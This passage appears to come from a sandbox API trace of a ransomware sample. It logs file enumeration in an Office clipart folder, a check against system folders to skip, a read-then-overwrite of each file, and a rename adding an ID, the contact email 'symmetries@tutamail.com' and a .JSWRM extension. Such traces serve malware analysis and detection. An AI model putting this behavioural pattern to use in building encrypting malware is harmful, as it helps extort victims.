dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0076.257] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2140) returned 1 [0076.257] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x850) returned 0x23fc98 [0076.257] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x850, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x850, lpOverlapped=0x0) returned 1 [0076.258] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.258] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x850, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x850, lpOverlapped=0x0) returned 1 [0076.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0076.258] CloseHandle (hObject=0x460) returned 1 [0076.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0076.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0076.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0076.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0076.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0076.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.259] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01143_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01143_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0076.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.259] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd790bed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd790bed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xadc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01145_.WMF", cAlternateFileName="")) returned 1 [0076.260] lstrcmpiW (lpString1="DD01145_.WMF", lpString2=".") returned 1 [0076.260] lstrcmpiW (lpString1="DD01145_.WMF", lpString2="..") returned 1 [0076.260] lstrcmpiW (lpString1="DD01145_.WMF", lpString2="...") returned 1 [0076.260] lstrcmpiW (lpString1="DD01145_.WMF", lpString2="windows") returned -1 [0076.260] lstrcmpiW (lpString1="DD01145_.WMF", lpString2="recovery") returned -1 [0076.260] lstrcmpiW (lpString1="DD01145_.WMF", lpString2="perflogs") returned -1 [0076.260] lstrcmpiW (lpString1="DD01145_.WMF", lpString2="documents and settings") returned -1 [0076.260] lstrcmpiW (lpString1="DD01145_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.260] lstrcmpiW (lpString1="DD01145_.WMF", lpString2="system volume information") returned -1 [0076.260] lstrcmpiW (lpString1="DD01145_.WMF", lpString2="msocache") returned -1 [0076.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0076.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01145_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01145_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01145_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0076.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0076.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01145_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01145_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01145_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0076.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01145_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.317] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2780) returned 1 [0076.317] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xad0) returned 0x24c1d0 [0076.317] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xad0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xad0, lpOverlapped=0x0) returned 1 [0076.318] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.318] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xad0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xad0, lpOverlapped=0x0) returned 1 [0076.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0076.319] CloseHandle (hObject=0x314) returned 1 [0076.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0076.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0076.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0076.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0076.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0076.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.319] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01145_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01145_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0076.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.320] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb709c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaec, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01146_.WMF", cAlternateFileName="")) returned 1 [0076.320] lstrcmpiW (lpString1="DD01146_.WMF", lpString2=".") returned 1 [0076.320] lstrcmpiW (lpString1="DD01146_.WMF", lpString2="..") returned 1 [0076.320] lstrcmpiW (lpString1="DD01146_.WMF", lpString2="...") returned 1 [0076.320] lstrcmpiW (lpString1="DD01146_.WMF", lpString2="windows") returned -1 [0076.320] lstrcmpiW (lpString1="DD01146_.WMF", lpString2="recovery") returned -1 [0076.320] lstrcmpiW (lpString1="DD01146_.WMF", lpString2="perflogs") returned -1 [0076.320] lstrcmpiW (lpString1="DD01146_.WMF", lpString2="documents and settings") returned -1 [0076.320] lstrcmpiW (lpString1="DD01146_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.320] lstrcmpiW (lpString1="DD01146_.WMF", lpString2="system volume information") returned -1 [0076.320] lstrcmpiW (lpString1="DD01146_.WMF", lpString2="msocache") returned -1 [0076.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0076.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01146_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01146_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01146_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0076.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0076.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01146_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01146_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01146_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0076.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.321] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01146_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.321] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2796) returned 1 [0076.321] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xae0) returned 0x24c1d0 [0076.321] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xae0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xae0, lpOverlapped=0x0) returned 1 [0076.323] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.323] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xae0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xae0, lpOverlapped=0x0) returned 1 [0076.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0076.323] CloseHandle (hObject=0x314) returned 1 [0076.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0076.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0076.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0076.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0076.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0076.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.323] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01146_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01146_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0076.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.324] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd790bed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd790bed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb90, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01151_.WMF", cAlternateFileName="")) returned 1 [0076.324] lstrcmpiW (lpString1="DD01151_.WMF", lpString2=".") returned 1 [0076.324] lstrcmpiW (lpString1="DD01151_.WMF", lpString2="..") returned 1 [0076.324] lstrcmpiW (lpString1="DD01151_.WMF", lpString2="...") returned 1 [0076.324] lstrcmpiW (lpString1="DD01151_.WMF", lpString2="windows") returned -1 [0076.324] lstrcmpiW (lpString1="DD01151_.WMF", lpString2="recovery") returned -1 [0076.324] lstrcmpiW (lpString1="DD01151_.WMF", lpString2="perflogs") returned -1 [0076.324] lstrcmpiW (lpString1="DD01151_.WMF", lpString2="documents and settings") returned -1 [0076.324] lstrcmpiW (lpString1="DD01151_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.324] lstrcmpiW (lpString1="DD01151_.WMF", lpString2="system volume information") returned -1 [0076.324] lstrcmpiW (lpString1="DD01151_.WMF", lpString2="msocache") returned -1 [0076.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0076.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01151_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01151_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01151_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0076.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0076.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01151_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01151_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01151_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0076.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.325] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01151_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.325] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2960) returned 1 [0076.325] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb90) returned 0x24c1d0 [0076.325] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xb90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xb90, lpOverlapped=0x0) returned 1 [0076.326] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.327] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xb90, lpOverlapped=0x0) returned 1 [0076.327] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0076.327] CloseHandle (hObject=0x314) returned 1 [0076.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.327] HeapFree (in: hHeap=0x1e0000, 